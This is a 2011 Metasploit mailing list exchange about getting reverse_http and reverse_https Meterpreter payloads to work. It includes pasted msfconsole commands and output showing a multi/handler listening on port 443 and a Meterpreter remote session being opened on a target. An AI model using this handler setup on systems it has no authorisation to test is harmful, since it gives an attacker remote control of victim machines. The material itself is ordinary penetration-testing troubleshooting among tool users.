Metasploit mailing list archives
Re: reverse_http(s) issues
From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Sat, 24 Sep 2011 00:36:49 +0300
I noticed that after today's update I believe SETTING LHOST TO THE EXACT IP IS NOT NEEDED ANYMORE, it can be 0.0.0.0 :) "don't you just LOVE the way and speed they react to our requests?" msf exploit(handler) > set LHOST LHOST => 0.0.0.0 msf exploit(handler) > exploit -j -z [*] Exploit running as background job. [*] Started HTTPS reverse handler on https://0.0.0.0:443/ [*] Starting the payload handler... msf exploit(handler) > [*] TARGET:62712 Request received for /INITM... [*] TARGET:62712 Staging connection for target /INITM received... [*] Patched transport at offset 486516... [*] Patched URL at offset 486248... [*] Patched Expiration Timeout at offset 641856... [*] Patched Communication Timeout at offset 641860... [*] Meterpreter session 1 opened (HANDLER:443 -> TARGET:62712) at 2011-09-24 00:32:09 +0300 sessions -i 1 [*] Starting interaction with 1... meterpreter > *HUGS* On Fri, Sep 23, 2011 at 7:44 PM, HD Moore <hdm () metasploit com> wrote:
On 9/22/2011 2:08 AM, Sherif El-Deeb wrote:For the impatient, both payloads are not working for me "tested on two separate machines, win7 x64, and one XP x86" no AV, help will be highly appreciated. HTTP: the payload connects to the handler, get the second stage, a session is created, then nothing "i.e. when I switch to the session, it doesn't accept any command", the exe keeps running. HTTPS: the payload connects to the handler, but the second stage get sent "16 times"... then nothing, no session created, and the exe quits. I've included the msfpayload command, the output of msfconsole, and a couple of lines from dumpcap, if I'm doing something wrong please correct me... thanks in advance.Did you set LHOST properly in the multi/handler? This cannot be 0.0.0.0, it must be the real address of the listener. ' -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- reverse_http(s) issues Sherif El-Deeb (Sep 22)
- Re: reverse_http(s) issues HD Moore (Sep 23)
- Message not available
- Fwd: reverse_http(s) issues Sherif El-Deeb (Sep 23)
- Message not available
- Re: reverse_http(s) issues Sherif El-Deeb (Sep 23)
- Re: reverse_http(s) issues HD Moore (Sep 23)
- Re: reverse_http(s) issues HD Moore (Sep 23)